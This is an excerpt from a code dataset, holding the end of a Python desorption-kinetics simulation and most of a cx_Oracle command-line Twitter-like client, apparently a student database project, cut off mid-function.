# Temperature ramp rate, K/s\nkb = 8.617*10**-5 #Boltzmann cst, eV/K\nNs = 5*10**14 #Sites/cm2\n\n#Initial Values\nthetaO2_0 = 0.2 #Initial coverage of stranded O2\nthetaO_0 = 0.8\n\n#Bundle Parameters for ODE solver\nparams = [A,E1a,E_1a,E2a,beta,kb]\n\n#Bundle initial conditions for ODE solver\ny0 = [thetaO_0,thetaO2_0]\n\n#Make indep variable array for solution\ntStop = 600.\ntInc=1.\nt= np.arange(10.,tStop,tInc)\n\n#Call the ODE Solver\npsoln = odeint(f, y0, t, args=(params,))\n\n#Differentiate to get dtheta/dT and get absiscca of t\nd=-np.diff(psoln.T)/np.diff(t)\ntd = (t[1:]+t[:-1])/2.\n\n#Calculate Desorption rate\nrd=[]\nfor thetaO2,T in zip(psoln[:,0],t):\n rate = Ns*thetaO2*A*np.e**(-E2a/kb/T)\n rd.append(rate)\n\n#Plot results\nfig = plt.figure(1,figsize=(8,8))\n\n#Plot theta as a function of Temp\nax1 = fig.add_subplot(311)\nax1.plot(t, psoln[:,1])\nax1.set_xlabel('Temp')\nax1.set_ylabel('theta')\n\n#Plot -dtheta/dT as a function of Temp\nax2 = fig.add_subplot(312)\nax2.plot(td, d.T[:,1])\nax2.set_xlabel('Temp')\nax2.set_ylabel('dtheta/dT')\n\n#Plot rate as a function of Temp\nax3 = fig.add_subplot(313)\nax3.plot(t, rd)\nax3.set_xlabel('Temp')\nax3.set_ylabel('desorption rate')\n\nplt.show()\n\n","sub_path":"TPD/RuO2_2O.py","file_name":"RuO2_2O.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118781248","text":"import cx_Oracle\nimport sys\nimport random\nimport datetime\nimport time\nimport getpass\n\n# Connects to the database and returns the connection object\n# Uses a file named \"connection.txt\" where the first line\n# is the username and the second line is the password\n# to log into oracle\ndef getConnection():\n\tusername = input(\"Please enter the username to connect to the Oracle database: \")\n\tpassword = getpass.getpass(\"Please enter the password to connect to the Oracle database: \")\n\ttry:\n\t\treturn cx_Oracle.connect(username, password, \"gwynne.cs.ualberta.ca:1521/CRS\")\n\texcept cx_Oracle.DatabaseError as exc:\n\t\terror = exc.args\n\t\tprint(sys.stderr, \"Oracle code:\", error.code)\n\t\tprint(sys.stderr, \"Oracle message:\", error.message)\n\t\tsys.exit()\n\n# Asks the user if they want to login, create an account, or exit\n# and call login(), createAccount(), or exit() appropriatly\n# Returns a tuple (a, b) where A is a boolean representing\n# whether a new account was created or not, and B is the users user_id\ndef displayLoginOrCreate(connection):\n\twhile (True):\n\t\tinp = input(\"Type 'login' to login, 'create' to create an account, or 'exit' to exit: \")\n\t\tif inp == \"exit\":\n\t\t\tconnection.close()\n\t\t\tsys.exit()\n\t\telif inp == \"login\":\n\t\t\tuser_id = login(connection)\n\t\t\tif (user_id == False):\n\t\t\t\tprint(\"Invalid user id/password.\")\n\t\t\telse:\n\t\t\t\tprint(\"Successfully logged in.\")\n\t\t\t\treturn (False, user_id)\n\t\telif inp == \"create\":\n\t\t\tuser_id = createAccount(connection)\n\t\t\tconnection.commit()\n\t\t\tprint(\"Successfully created an account and logged in.\")\n\t\t\treturn (True, user_id)\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Trys to log in using a user id and password\n# On success returns the user id, else returns false\ndef login(connection):\n\twhile (True):\n\t\tuser_id = input(\"Please input your user id: \")\n\t\ttry:\n\t\t\tuser_id = int(user_id)\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"User id must be an integer.\")\n\tuser_password = 
input(\"Please input your password: \")\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from users where usr = :id and trim(pwd) = :password\")\n\tcurs.execute(None, {'id':user_id, 'password':user_password})\n\tif curs.fetchone():\n\t\tcurs.close()\n\t\treturn user_id\n\telse:\n\t\tcurs.close()\n\t\treturn False\n\n# Creates a new account and returns the user id given by the system\ndef createAccount(connection):\n\tuser_name = \"\"\n\tuser_email = \"\"\n\tuser_city = \"\"\n\tuser_timezone = 0\n\tuser_password = \"\"\n\tuser_id = random.randrange(-2147483648, 2147483647) #-2^31 to (2^31)-1\n\twhile (True):\n\t\tuser_name = input(\"Please input a name: \")\n\t\tif len(user_name) > 20:\n\t\t\tprint(\"Maximum length of name is 20.\")\n\t\telse:\n\t\t\tbreak\n\twhile (True):\n\t\tuser_email = input(\"Please enter an email: \")\n\t\tif len(user_email) > 15:\n\t\t\tprint(\"Maximum length of email is 15.\")\n\t\telse:\n\t\t\tbreak\n\twhile (True):\n\t\tuser_city = input(\"Please enter a city: \")\n\t\tif len(user_city) > 12:\n\t\t\tprint(\"Maximum length of city is 12.\")\n\t\telse:\n\t\t\tbreak\n\twhile (True):\n\t\tuser_timezone = input(\"Please enter a timezone: \")\n\t\ttry:\n\t\t\tuser_timezone = float(user_timezone)\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"Timezone must be a float.\")\n\twhile (True):\n\t\tuser_password = input(\"Please enter a password: \")\n\t\tif len(user_password) > 4:\n\t\t\tprint(\"Maximum length of password is 4.\")\n\t\telse:\n\t\t\tbreak\n\n\t# Check that the user id is unique\n\twhile (True):\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"select * from users where usr = :id\")\n\t\tcurs.execute(None, {'id':user_id})\n\t\tif curs.fetchone():\n\t\t\tuser_id = random.randrange(-2147483648, 2147483647)\n\t\t\tcurs.close()\n\t\telse:\n\t\t\tprint(\"User id is: \", user_id)\n\t\t\tcurs.close()\n\t\t\tbreak\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into users values (:id, :pwd, :name, :email, :city, :timezone)\")\n\tcurs.execute(None, {'id':user_id, 'pwd':user_password, 'name':user_name, 'email':user_email, 'city':user_city, 'timezone':user_timezone})\n\tcurs.close()\n\tconnection.commit()\n\treturn user_id\n\n# Displays all tweets and retweets from users that user_id follows\n# Also asks the user if they want to see more information about a tweet\ndef displayTweetsAndRetweets(connection, user_id):\n\trows = getTweetsFromFollowedUsers(connection, user_id)\n\tif len(rows) > 0:\n\t\tprint()\n\t\tprint(\"Tweets/retweets from the users you follow:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(str(i) + \" (\" + str(rows[i-1][0]) + \", \" + str(rows[i-1][1]) + \", \" + str(rows[i-1][2]) + \", \" + str(rows[i-1][3]).strip() + \", \" + str(rows[i-1][4]) + \")\")\n\n\t\t\t# Either 5 tweets/retweets have been printed or we have reached the end of the tweets/retweets\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tprint()\n\t\t\t\tinp = \"\"\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the tweets/retweets\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 tweets/retweets were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweet, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if only a single tweet/retweet was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the tweet, 
\"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % (i))\n\t\t\t\t\t\t# Either 2, 3, or 4 tweets/retweets were printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweet, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-(i%5) + 1), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweets/retweets\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more tweets/retweets to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweet, \"\n\t\t\t\t\t\t\"'more' to view the next 5 tweets, or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweets/retweets\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\t\t\t\t\tprint()\n\t\t\t\t# A tweet was selected\n\t\t\t\telse:\n\t\t\t\t\tdisplayTweetStats(connection, user_id, rows[int(inp)-1][0])\n\t\t\t\t\tindices = []\n\t\t\t\t\tif i%5 == 0:\n\t\t\t\t\t\ti = i-5\n\t\t\t\t\telse:\n\t\t\t\t\t\ti = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No tweets/retweets from users you follow.\")\n\n# Returns all tweets/retweets from users that the logged in user follows\ndef getTweetsFromFollowedUsers(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from \"\n\t\t\t\t\"((select t.tid, t.writer, t.tdate, t.text, t.replyto \"\n\t\t\t\t\"from follows f, tweets t \"\n\t\t\t\t\"where f.flwer = :id and t.writer = f.flwee) \"\n\t\t\t\t\"union (select t.tid, t.usr as writer, t.rdate as tdate, ot.text, ot.replyto \"\n\t\t\t\t\"from follows f, retweets t, tweets ot \"\n\t\t\t\t\"where f.flwer = :id and t.usr = f.flwee and t.tid = ot.tid)) \"\n\t\t\t\t\"order by tdate desc\")\n\tcurs.execute(None, {'id':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n# Displays the tweet stats and asks the user if he wants to reply or retweet\ndef displayTweetStats(connection, user_id, tweet_id):\n\tstats = getTweetStats(connection, tweet_id)\n\tprint()\n\tprint(\"(\" + str(stats[0]) + \", \" + str(stats[1]) + \", \" + str(stats[2]) + \", \" + str(stats[3]).strip() + \", \" + str(stats[4]) + \", \" + str(stats[5]) + \", \" + str(stats[6]) + \")\")\n\tprint()\n\n\tinp = \"\"\n\twhile(True):\n\t\tinp = input(\"Type 'reply' to reply to the tweet, 'retweet' to retweet the tweet, \"\n\t\t\"or 'back' to return to the last screen: \")\n\t\tif inp != \"reply\" and inp != \"retweet\" and inp != \"back\":\n\t\t\tprint(\"Unrecoginzed input, please try again\")\n\t\telse:\n\t\t\tbreak\n\tif inp == \"reply\":\n\t\tdisplayComposeTweet(connection, user_id, tweet_id)\n\telif inp == \"retweet\":\n\t\tretweet(connection, user_id, tweet_id)\n\n# Returns the number of retweets and replies for the tweet\ndef getTweetStats(connection, tweet_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select tid, writer, tdate, text, replyto, 
(select nvl(count(*), 0) from tweets where replyto = :tid1) as num_tweets, \"\n\t\t\"(select nvl(count(*), 0) from retweets where tid = :tid2) as num_retweets from tweets where tid = :tid3\")\n\tcurs.execute(None, {'tid1':tweet_id, 'tid2':tweet_id, 'tid3':tweet_id})\n\trow = curs.fetchone()\n\tcurs.close()\n\treturn row\n\n# Return the followers that the selected user followed\ndef searchAllFollowers(connection, user_id):\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select flwer,flwee,start_date,name from follows, users \"\n\t\t\t\t\"where flwee = :usr and usr = flwer\")\n\tcurs.execute(None, {'usr':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n#returning to follwing status, that is, when you select a user, you can follow this user\n#each user can only be follwed by once.\n#once followed the user, the comman should be: \"successfully followed\"\ndef followUsers(connection,flwee,user_id):\n\t#user_id = searchAllFollowers(connection,user_id)\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from follows where (flwer = :flwer and flwee =:flwee)\")\n\tcurs.execute(None, {'flwer':user_id, 'flwee':flwee})\n\trows = curs.fetchall()\n\tif ( len(rows) > 0) :\n\t\tprint( \"you have already followed this user\")\n\telse :\n\t\tcurs.prepare(\"insert into follows values (:flwer, :flwee, :start_date)\")\n\t\tcurs.execute(None, {'flwer':user_id, 'flwee':flwee, 'start_date':time.strftime(\"%d-%b-%Y\")})\n\t\tprint(\"Successfully followed\")\n\tconnection.commit()\n\tcurs.close()\n\n#the list followers function. when typing in the termial\"search followers\", it should be a list of followers\n#that following the user you logged in. Once you select a follower,you can see informations about the user,\n#and also have the option to follow this user.\ndef displayAllFollowers(connection,user_id):\n\n\trows = searchAllFollowers(connection,user_id)\n\n\tif len(rows) > 0:\n\t\tprint(\"Followers list,please choose:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 5 Followers have been printed or we have reached the end of the users\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the followers\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 followers were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the follower, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the follower: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if only a single follower was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the follower, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the follower: \" % (i))\n\t\t\t\t\t\t# Either 2, 3, or 4 follower were printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the follower, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the follower: \" % ((i-(i%5)+1), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the follower\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" :\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more follower to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = 
input(\"Type numbers %s-%s to view more information about the follower, \"\n\t\t\t\t\t\t\"'more' to view the next 5 user, or 'skip' to skip viewing the follower: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the follower\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\t\t\t\t#elif inp == \"follow\":\n\t\t\t\t#\tfollowUsers(connection, rows[i-1][1],user_id)\n\t\t\t\t#\tbreak\n\t\t\t\t# A user was selected\n\t\t\t\telse:\n\t\t\t\t\tdisplayUserStats(connection, rows[int(inp)-1][0],user_id)\n\t\t\t\t\tindices = []\n\t\t\t\t\tif i%5 == 0:\n\t\t\t\t\t\ti = i-5\n\t\t\t\t\telse:\n\t\t\t\t\t\ti = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No Follower .\")\n\n# Gets the tweet text from the user for a new tweet\ndef displayComposeTweet(connection, user_id, replyto):\n\ttext = \"\"\n\thashtags = []\n\twhile(True):\n\t\ttext = input(\"Enter the text of your tweet: \")\n\t\ttextGood = True\n\t\thashtags = getHashtags(text)\n\t\tfor hashtag in hashtags:\n\t\t\tif len(hashtag) > 10:\n\t\t\t\tprint(\"Maximum length of a hashtag is 10 characters, please try again.\")\n\t\t\t\ttextGood = False\n\t\tif len(hashtags) > len(set(hashtags)):\n\t\t\tprint(\"You can only use a hashtag once in a single tweet, please try again.\")\n\t\t\ttextGood = False\n\t\tif len(text) > 80:\n\t\t\tprint(\"Maximum length of tweet text is 80 characters, please try again.\")\n\t\t\ttextGood = False\n\t\tif textGood:\n\t\t\tbreak\n\tcomposeTweet(connection, user_id, text, replyto, hashtags)\n\n# Creates a new tweet and adds the hashtags to the hashtag and mentions tables\ndef composeTweet(connection, user_id, text, replyto, hashtags):\n\t# Get a tweet id and check that it is unique\n\ttid = random.randrange(-2147483648, 2147483647) #-2^31 to (2^31)-1\n\twhile (True):\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"select * from tweets where tid = :tid\")\n\t\tcurs.execute(None, {'tid':tid})\n\t\tif curs.fetchone():\n\t\t\ttid = random.randrange(-2147483648, 2147483647)\n\t\telse:\n\t\t\tcurs.close()\n\t\t\tbreak\n\n\t# Insert the tweet into the tweets table\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into tweets values (:tid, :writer, :tdate, :text, :replyto)\")\n\tcurs.execute(None, {'tid':tid, 'writer':user_id, 'tdate':datetime.datetime.now(), 'text':text, 'replyto':replyto})\n\tconnection.commit()\n\tcurs.close()\n\n\t# Add the hashtags to the mentions and hashtag tables\n\tfor hashtag in hashtags:\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"select * from hashtags where trim(term) = :htag\")\n\t\tcurs.execute(None, {'htag':hashtag})\n\t\trow = curs.fetchone()\n\t\tif not (row):\n\t\t\t# This is a new hashtag to add it to the hashtag table\n\t\t\tcurs2 = connection.cursor()\n\t\t\tcurs2.prepare(\"insert into hashtags values (:term)\")\n\t\t\tcurs2.execute(None, {'term':hashtag})\n\t\t\tconnection.commit()\n\t\t\tcurs2.close()\n\t\tcurs.close()\n\n\t\t# Add the hashtag to the mentions table\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"insert into mentions values (:tid, :term)\")\n\t\tcurs.execute(None, {'tid':tid, 'term':hashtag})\n\t\tconnection.commit()\n\t\tcurs.close()\n\n\tprint(\"Successfully tweeted\")\n\n# Gets all the hashtags 
from a string\ndef getHashtags(str):\n\tstrs = str.split()\n\thashtags = []\n\tfor st in strs:\n\t\tif st[0] == '#' and len(st) > 1:\n\t\t\tif st[1:] not in hashtags:\n\t\t\t\thashtags.append(st[1:])\n\treturn hashtags\n\n# Creates a new retweet\ndef retweet(connection, user_id, tweet_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from retweets where tid = :tid and usr = :id\")\n\tcurs.execute(None, {'tid':tweet_id, 'id':user_id})\n\n\tif curs.fetchone():\n\t\tprint(\"You cannot retweet a tweet more than once.\")\n\t\tcurs.close()\n\t\treturn\n\tcurs.close()\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into retweets values (:id, :tid, :tdate)\")\n\tcurs.execute(None, {'id':user_id, 'tid':tweet_id, 'tdate':datetime.datetime.now()})\n\tcurs.close()\n\tconnection.commit()\n\tprint(\"Successfully retweeted.\")\n\n# return to users that you searched by the key word\ndef searchAllUsers(connection, inp):\n\n\tinp = '%' + inp + '%'\n\tcurs = connection.cursor()\n\n\tcurs.prepare(\"select * from (select name,usr,city from users where name like :keyName order by length(trim(name)) asc, length(trim(city)) asc ) \"\n\t\t\t\" union all select * from (select name,usr,city from users where city like :keyName and name not like :keyName \"\n\t\t\t\" order by length(trim(city)) asc,length(trim(name)) asc)\")\n\n\tcurs.execute(None, {'keyName':inp})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n#the search users function. after logged in, you should be able to search any users by a key word. Thsy are\n# listing by an ascending order. once you select a user, you can see any informations about the user. you can\n# also have the option to follow this user.\ndef displayAllUsers(connection,user_id):\n\tinp = input(\"Please input a keyword : \")\n\t#inp2 = input(\"Do you wanto to follow the user? 
\")\n\trows = searchAllUsers(connection, inp)\n\t#follow = followusers(connection, flwer)\n\tif len(rows) > 0:\n\t\tprint(\"users list,please choose:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 5 user have been printed or we have reached the end of the users\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the users\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 user were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the user, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the users: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if only a single user was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the user, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the users: \" % (i))\n\n\t\t\t\t\t\t# Either 2, 3, or 4 user were printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the user, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the users: \" % ((i-(i%5)+1), i))\n\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the user\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more user to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the user, \"\n\t\t\t\t\t\t\"'more' to view the next 5 user, or 'skip' to skip viewing the user: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the user\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\n\t\t\t\t# A user was selected\n\t\t\t\telse:\n\t\t\t\t\tdisplayUserStats(connection, rows[int(inp)-1][1],user_id)\n\t\t\t\t\tindices = []\n\t\t\t\t\tif i%5 == 0:\n\t\t\t\t\t\ti = i-5\n\t\t\t\t\telse:\n\t\t\t\t\t\ti = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No suit users .\")\n\n# return to the users status, like number of followers, number of folowing users, number of tweets\ndef getUserStats(connection, user_id):\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select b1.twnum,b2.fenum,b3.frnum from (select count(tid) twnum from tweets where writer =:user1 ) b1 ,\"\n\t\t\"(select count(flwer) fenum from follows where flwee = :user1 ) b2,\"\n\t\t\"(select count(flwee) frnum from follows where flwer = :user1 ) b3 \")\n\tcurs.execute(None, {'user1':user_id })\n\trow = curs.fetchone()\n\tcurs.close()\n\treturn row\n\n# return to the tweets ordered by recent updated\ndef getUserTweets(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from tweets where writer= :user1 order by tdate desc \")\n\tcurs.execute(None, {'user1':user_id })\n\trow = curs.fetchall()\n\tcurs.close()\n\treturn row\n\n#display the users users status, like number of followers, number of folowing users, 
number of 3 recent tweets\ndef displayUserStats(connection, user,user_id):\n\n\tstats = getUserStats(connection, user)\n\tprint(\"the number of tweets is \",stats[0],\" the number of users being followed is \",stats[2],\"the number of followers is \" ,stats[1])\n\trows = getUserTweets(connection,user)\n\tinp = \"\"\n\tif len(rows) > 0:\n\t\tprint(\"Recent Tweets:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 3 tweets have been printed or we have reached the end of the tweets\n\t\t\tif ((i%3) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the tweets/retweets\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\tinp = input(\"Type 'follow' to follow the user, or 'skip' to skip viewing the tweets: \")\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"follow\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\t\t# There are still more tweets to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type 'more' to view the next 3 tweets, 'follow' to follow \"\n\t\t\t\t\t\t\"the user, or 'skip' to skip viewing the user: \")\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\" or inp == \"follow\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\t\t\t\telif inp == \"follow\":\n\t\t\t\t\tfollowUsers(connection, user, user_id)\n\t\t\t\t\tbreak\n\t\t\ti = i + 1\n\n\telse:\n\t\tprint(\"No tweets.\")\n\n\t\twhile(True):\n\t\t\tinp = input(\"Type 'follow' to follow the user: or 'skip' to skip viewing the follower: \" )\n\t\t\tif inp == \"skip\":\n\t\t\t\tbreak\n\t\t\telif inp == \"follow\":\n\t\t\t\tfollowUsers(connection, user,user_id)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Prompt for managing lists\ndef displayManageLists(connection, user_id):\n\tinp = \"\"\n\twhile (True):\n\t\tinp = input(\"Type 'my lists' to view your lists, 'on lists' to view the lists you are on, 'create list' to create a new list, or 'back' to return to the last screen: \")\n\t\tif inp == \"my lists\":\n\t\t\tdisplayMyLists(connection, user_id)\n\t\telif inp == \"on lists\":\n\t\t\tdisplayOnLists(connection, user_id)\n\t\telif inp == \"create list\":\n\t\t\tdisplayCreateList(connection, user_id)\n\t\telif inp == \"back\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Displays all of the user's lists\ndef displayMyLists(connection, user_id):\n\tlists = getMyLists(connection, user_id)\n\n\ti = 1\n\tfor row in lists:\n\t\tprint(i, row[0])\n\t\ti = i + 1\n\n\tinp = \"\"\n\tif i > 1:\n\t\twhile (True):\n\t\t\tif i > 2:\n\t\t\t\tinp = input(\"Type numbers 1-%s to manage the list or 'back' to return to the last screen: \" % (i - 1))\n\t\t\telse:\n\t\t\t\tinp = input(\"Type number 1 to manage the list or 'back' to return to the last screen: \")\n\n\t\t\tif inp == \"back\":\n\t\t\t\tbreak\n\t\t\ttry:\n\t\t\t\tif int(inp) > 0 and int(inp) < i:\n\t\t\t\t\tdisplayList(connection, user_id, lists[int(inp) - 1][0])\n\t\t\t\t\t# reprint the lists\n\t\t\t\t\ti = 1\n\t\t\t\t\tfor row in lists:\n\t\t\t\t\t\tprint(i, row[0])\n\t\t\t\t\t\ti = i + 1\n\t\t\texcept:\n\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Returns all the lists that the user has\ndef 
getMyLists(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select lname from lists where owner = :owner\")\n\tcurs.execute(None, {'owner':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n# Displays the members of the list and gives the option to add or remove a member from the list\ndef displayList(connection, user_id, listName):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select member from includes where lname = :listName\")\n\tcurs.execute(None, {'listName':listName})\n\trows = curs.fetchall()\n\tcurs.close\n\n\tif len(rows) > 0:\n\t\tprint(\"List Members:\")\n\t\tfor row in rows:\n\t\t\tprint(row[0])\n\telse:\n\t\tprint(\"This list has no members.\")\n\n\tinp = \"\"\n\twhile (True):\n\t\tinp = input(\"Type 'add [member]' to add [member] to the list, 'remove [member]' to remove [member] from the list, or 'back' to return to the last screen: \")\n\t\tif inp == \"back\":\n\t\t\tbreak\n\t\telif len(inp) > 4 and inp[:4] == \"add \":\n\t\t\t# check that the member exists\n\t\t\ttry:\n\t\t\t\tmemberId = int(inp[4:])\n\t\t\t\tcurs = connection.cursor()\n\t\t\t\tcurs.prepare(\"select * from users where usr = :userId\")\n\t\t\t\tcurs.execute(None, 